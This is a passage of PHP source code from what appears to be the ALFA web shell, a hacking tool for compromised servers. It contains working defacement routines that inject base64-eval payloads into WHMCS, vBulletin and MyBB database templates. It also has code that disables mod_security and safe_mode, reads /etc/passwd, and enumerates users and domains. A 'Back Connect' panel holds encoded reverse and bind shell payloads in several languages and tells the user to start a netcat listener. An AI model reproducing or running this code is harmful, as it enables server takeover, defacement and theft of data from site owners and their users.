3898);
3899create_table($table);
3900echo "<br><div class='txtfont'>| Your Index |</div><br>
3901<textarea name=index rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
3902<input type='submit' value=' '>
3903</form></center></center>";
3904if(isset($_POST['alfa6'])){
3905$s0levisible="Powered By Solevisible";
3906$dbu = $_POST['alfa6'];
3907$path = $_POST['alfa5'];
3908$fname = $_POST['alfa4'];
3909$dbn = $_POST['alfa7'];
3910$dbp = $_POST['alfa8'];
3911$dbh = $_POST['alfa9'];
3912$index = $_POST['alfa10'];
3913$index = str_replace("\'","'",$index);
3914$deface = '$x = base64_decode("'.__ZW5jb2Rlcg($index).'"); $solevisible = fopen("'.$fname.'","w"); fwrite($solevisible,$x);';
3915$saveData = __ZW5jb2Rlcg($deface);
3916$Def = '{php}eval(base64_decode("'.$saveData.'"));{/php}';
3917if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
3918$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
3919$soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
3920$soleGet = mysqli_fetch_assoc($soleSave);
3921$tempSave1 = $soleGet['message'];
3922$tempSave = str_replace("'","\'",$tempSave1);
3923$inject = "UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'";
3924$result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));
3925$create = "insert into tblclients (email) values('solevisible@fbi.gov')";
3926$result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));
3927if(function_exists('curl_version')){
3928$AlfaSole = new AlfaCURL(true);
3929$saveurl = $AlfaSole->Send($path."/pwreset.php");
3930$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
3931$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
3932$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
3933$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
3934__alert('File Created...');
3935echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$path."/".$fname."'>Click Here !</a></font></b></center><br><br>";
3936}else{
3937echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target </font><font color=red>\" ".$path."/pwreset.php \"</font><br/><font color=\"#FFFFFF\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\"#FFFFFF\">and go to</font> <font color=red>\" ".$path."/".$fname." \"</font></b></center><br><br>";
3938}}}}
3939if(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')){
3940echo __pre();
3941
3942echo "<center><center><div class='txtfont_header'>| vBulletin |</div>
3943<p><center>".getConfigHtml('vb')."<form onSubmit=\"g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>'); return false;\">
3944";
3945$table = array('td1' =>
3946 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
3947 'td2' =>
3948 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
3949 'td3' =>
3950 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
3951 'td4' =>
3952 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
3953 'td5' =>
3954 array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50')
3955);
3956create_table($table);
3957echo "<br><div class='txtfont'>| Your Index |</div><br>
3958<textarea name='index' rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
3959<input type='submit' value=' '></form></center></center>";
3960if($_POST['alfa8']=='>>'){
3961$s0levisible="Powered By Solevisible";
3962$dbu = $_POST['alfa2'];
3963$dbn = $_POST['alfa3'];
3964$dbp = $_POST['alfa4'];
3965$dbh = $_POST['alfa5'];
3966$index = $_POST['alfa6'];
3967$prefix = $_POST['alfa7'];
3968$index=str_replace("\'","'",$index);
3969$set_index = "{\${eval(base64_decode(\'";
3970$set_index .= __ZW5jb2Rlcg("echo \"$index\";");
3971$set_index .= "\'))}}{\${exit()}}";
3972if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
3973$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
3974$loli1 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='spacer_open'";
3975$loli2 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='FORUMHOME'";
3976$loli3 = "UPDATE ".$prefix."style SET css='".$set_index."".$s0levisible."', stylevars='', csscolors='', editorstyles=''";
3977@mysqli_query($conn,$loli1) or die (mysqli_error($conn));
3978@mysqli_query($conn,$loli2) or die (mysqli_error($conn));
3979@mysqli_query($conn,$loli3) or die (mysqli_error($conn));
3980__alert('VB index changed...!');
3981}
3982}
3983}
3984if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) {
3985echo __pre();
3986
3987echo "<center><center><div class='txtfont_header'>| Mybb |</div>
3988<p><center>".getConfigHtml('mybb')."<form onSubmit=\"g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\" method=POST action=''>
3989";
3990$table = array('td1' =>
3991 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
3992 'td2' =>
3993 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
3994 'td3' =>
3995 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
3996 'td4' =>
3997 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
3998);
3999create_table($table);
4000echo "<br><div class='txtfont'>| Your Index |</div><br>
4001<textarea name=mybbindex rows='19' cols='103'>
4002<title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type='submit' value='' ></p></form></center></center>";
4003if(isset($_POST['alfa6'])){
4004$mybb_dbh = $_POST['alfa6'];
4005$mybb_dbu = $_POST['alfa7'];
4006$mybb_dbn = $_POST['alfa8'];
4007$mybb_dbp = $_POST['alfa9'];
4008$mybb_index = $_POST['alfa10'];
4009if(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){
4010$conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));
4011$prefix="mybb_";
4012$loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
4013$result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));
4014__alert('MyBB index changed...!');
4015}
4016}
4017}
4018echo "</div>";
4019alfafooter();
4020}
4021function alfaproc()
4022{
4023alfahead();
4024echo "<Div class=header><br><center>";
4025if(empty($_POST['ajax'])&&!empty($_POST['alfa1']))
4026$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
4027if($GLOBALS['sys']=="win"){
4028$process=array(
4029"Task List" =>"tasklist /V",
4030"System Info" =>"systeminfo",
4031"Active Connections" => "netstat -an",
4032"Running Services" => "net start",
4033"User Accounts" => "net user",
4034"Show Computers" => "net view",
4035"ARP Table" => "arp -a",
4036"IP Configuration" => "ipconfig /all"
4037);}else{
4038$process=array(
4039"Process status" => "ps aux",
4040"Syslog" =>"cat /etc/syslog.conf",
4041"Resolv" => "cat /etc/resolv.conf",
4042"Hosts" =>"cat /etc/hosts",
4043"Cpuinfo"=>"cat /proc/cpuinfo",
4044"Version"=>"cat /proc/version",
4045"Sbin"=>"ls -al /usr/sbin",
4046"Interrupts"=>"cat /proc/interrupts",
4047"lsattr"=>"lsattr -va",
4048"Uptime"=>"uptime",
4049"Fstab" =>"cat /etc/fstab"
4050);}
4051foreach($process as $n => $link){
4052echo '<a href="javascript:void(0);" onclick="g(\'proc\',null,\''.$link.'\')"> | '.$n.' | </a>';
4053}
4054echo "</center><br>";
4055if(!empty($_POST['alfa1'])){
4056echo "<pre class='ml1' style='margin-top:5px' >";
4057if(isset($GLOBALS["glob_chdir_false"])&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."';";}
4058echo alfaEx($cmd.$_POST['alfa1']);
4059echo '</pre>';
4060}
4061echo "</div>";
4062alfafooter();
4063}
4064function alfasafe(){
4065alfahead();
4066echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";
4067echo '<h3><a href=javascript:void(0) onclick="g(\'safe\',null,\'php.ini\',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,\'ini\')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,\'pl\')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,\'passwd\')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,\'users\')">| Read-Users | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,\'valiases\')">| Get-User | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,null,null,\'domains\')">| Get-Domains | </a></center></h3>';
4068if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains'){
4069if(!_alfa_file_exists("/etc/virtual/domainowners")){
4070echo __pre();
4071$solevisible9 = _alfa_file('/etc/named.conf');
4072if(is_array($solevisible9)){
4073foreach($solevisible9 as $solevisible13){
4074if(@eregi('zone',$solevisible13)){
4075preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
4076if(strlen(trim($solevisible14[1][0])) > 2){
4077echo $solevisible14[1][0].'<br>';
4078}}}
4079}
4080}else{
4081echo __pre();
4082$users = _alfa_file("/etc/virtual/domainowners");
4083if(is_array($users)){
4084foreach($users as $boz){
4085$dom = explode(":",$boz);
4086echo $dom[0]."\n";}}}}
4087if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases'){
4088echo '
4089<form onsubmit="g(\'safe\',null,null,null,null,null,null,\'valiases\',this.site.value,null,\'>>\'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>';
4090if(isset($_POST['alfa9']) && $_POST['alfa9'] == '>>'){
4091if(!_alfa_file_exists("/etc/virtual/domainowners")){
4092$site = trim($_POST['alfa7']);
4093$rep = str_replace(array("https://","http://","www."),"",$site);
4094$user = "";
4095if(function_exists("posix_getpwuid") && function_exists("fileowner")){
4096 if($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){
4097 $user = $user['name'];
4098 }
4099}else{
4100 if(_alfa_can_runCommand(true,true)){
4101 $user = alfaEx("stat -c '%U' /etc/valiases/".$rep);
4102 }
4103}
4104if(!empty($user)&&$user!='root'){
4105echo __pre()."<center><table border='1'><tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user}</font></b></td></tr><tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
4106}else {echo __pre().'<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';}
4107}else{
4108$site = trim($_POST['alfa7']);
4109$rep = str_replace(array("https://","http://","www."),"",$site);
4110$users = _alfa_file("/etc/virtual/domainowners");
4111foreach($users as $boz){
4112$ex = explode(":",$boz);
4113if($ex[0] == $rep){
4114echo __pre()."<center><table border='1'>
4115<tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">".trim($ex[1])."</font></b></td></tr>
4116<tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";break;}}}}}
4117if(!empty($_POST['alfa5']) && isset($_POST['alfa5'])){
4118if(!_alfa_file_exists("/etc/virtual/domainowners")){
4119echo __pre();
4120$i = 0;
4121while ($i < 60000) {
4122$line = @posix_getpwuid($i);
4123if (!empty($line)) {
4124while (list ($key, $vl) = each($line)){
4125echo $vl."\n";
4126break;}}$i++;}
4127}else{echo __pre();
4128$users = _alfa_file("/etc/virtual/domainowners");
4129foreach($users as $boz){
4130$user = explode(":",$boz);
4131echo trim($user[1]).'<br>';}}}
4132if(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){
4133echo __pre();
4134if(_alfa_can_runCommand(true,true)){echo __read_file("/etc/passwd");}elseif(function_exists("posix_getpwuid")){
4135for($uid=0;$uid<60000;$uid++){
4136$ara = @posix_getpwuid($uid);
4137if(!empty($ara)){
4138while(list ($key, $val) = each($ara)){
4139echo "$val:";
4140}echo "\n";}}
4141}else{__alert('failed...');}}
4142if(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){
4143@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>");
4144echo '<center><b><big>htaccess for Apache created...!</center></b></big>';
4145}
4146if(!empty($_POST['alfa1'])&& isset($_POST['alfa1'])){
4147@__write_file($GLOBALS['cwd']."php.ini","safe_mode=OFF\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");
4148echo '<center><b><big> php.ini created...!</center></b></big>';
4149}
4150if(!empty($_POST['alfa3']) && isset($_POST['alfa3'])){
4151@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
4152echo '<center><b><big>htaccess for Litespeed created...!</center></b></big>';
4153}
4154echo "<br></div>";
4155alfafooter();
4156}
4157function __get_resource($content){
4158return @gzinflate(__ZGVjb2Rlcg($content));
4159}
4160function __write_file($file, $content){
4161if($fh = @fopen($file, "wb")){
4162if(fwrite($fh, $content)!==false) return true;
4163}
4164return false;
4165}
4166function bcinit($evalType, $evalCode, $evalOptions, $evalArguments){
4167$res = "<font color='green'>[ Success...! ]</font>";
4168$err = "<font color='red'>[ Failed...! ]</font>";
4169if($evalOptions!="") $evalOptions = $evalOptions." ";
4170if($evalArguments!="") $evalArguments = " ".$evalArguments;
4171if($evalType=="c"){
4172$tmpdir = ALFA_TEMPDIR;
4173chdir($tmpdir);
4174if(is_writable($tmpdir)){
4175$uniq = substr(md5(time()),0,8);
4176$filename = $evalType.$uniq.".c";
4177$path = $filename;
4178if(__write_file($path, $evalCode)){
4179$ext = ($GLOBALS['sys']=='win')? ".exe":".out";
4180$pathres = $filename.$ext;
4181$evalOptions = "-o ".$pathres." ".$evalOptions;
4182$cmd = "gcc ".$evalOptions.$path;
4183alfaEx($cmd);
4184if(is_file($pathres)){
4185if(chmod($pathres, 0755)){
4186$cmd = $pathres.$evalArguments;
4187alfaEx($cmd);
4188}else{$res = $err;}
4189unlink($pathres);
4190}else{$res = $err;}
4191unlink($path);
4192}else{$res = $err;}
4193}
4194return $res;
4195}elseif($evalType=="java"){
4196$tmpdir = ALFA_TEMPDIR;
4197chdir($tmpdir);
4198if(is_writable($tmpdir)){
4199if(preg_match("/class\ ([^{]+){/i",$evalCode, $r)){
4200$classname = trim($r[1]);
4201$filename = $classname;
4202}else{
4203$uniq = substr(md5(time()),0,8);
4204$filename = $evalType.$uniq;
4205$evalCode = "class ".$filename." { ".$evalCode . " } ";
4206}
4207$path = $filename.".java";
4208if(__write_file($path, $evalCode)){
4209$cmd = "javac ".$evalOptions.$path;
4210alfaEx($cmd);
4211$pathres = $filename.".class";
4212if(is_file($pathres)){
4213if(chmod($pathres, 0755)){
4214$cmd = "java ".$filename.$evalArguments;
4215alfaEx($cmd);
4216}else{$res = $err;}
4217unlink($pathres);
4218}else{$res = $err;}
4219unlink($path);
4220}else{$res = $err;}
4221}
4222return $res;
4223}
4224return false;
4225}
4226function alfaconnect(){
4227alfahead();
4228$php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
4229$python="pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";
4230$perl="lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";
4231$ruby="tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";
4232$node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
4233$c="tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";
4234$java="lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";
4235echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>";
4236echo "<form onSubmit=\"g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\">
4237<div class=\"txtfont\">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);' style='width:120px;'><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class=\"txtfont\">Use:</div> <select name='selectCb'>";
4238$cbArr = array("php"=>"Php","perl"=>"Perl","python"=>"Python","ruby"=>"Ruby","c"=>"C","java"=>"Java","node"=>"NodeJs","bcwin"=>"Windows");
4239foreach($cbArr as $key=>$val){echo("<option value='{$key}' ".($GLOBALS['sys']=='win'?'selected':'').">{$val}</option>");}
4240echo "</select> <div id='bcipAction' style='display:inline-block;'><div class=\"txtfont\">IP:</div> <input type='text' style='text-align:center;' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'></div> <div class=\"txtfont\">Port: </div> <input type='text' size='5' style='text-align:center;' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>";
4241if(isset($_POST['alfa1'])&&!empty($_POST['alfa1'])){
4242$lang = $_POST['alfa1'];
4243$ip = $_POST['alfa2'];
4244$port = $_POST['alfa3'];
4245$arg = ($_POST['alfa4']=='bind'?$port:$port.' '.$ip);
4246$tmpdir = ALFA_TEMPDIR;
4247$name = $tmpdir.'/'.$lang.uniqid().rand(1,99999);
4248$allow = array('perl','ruby','python','node');
4249eval('$lan=$'.$lang.';');
4250if(in_array($lang,$allow)){
4251if(__write_file($name,__get_resource($lan))){
4252if(_alfa_can_runCommand(true,true)){
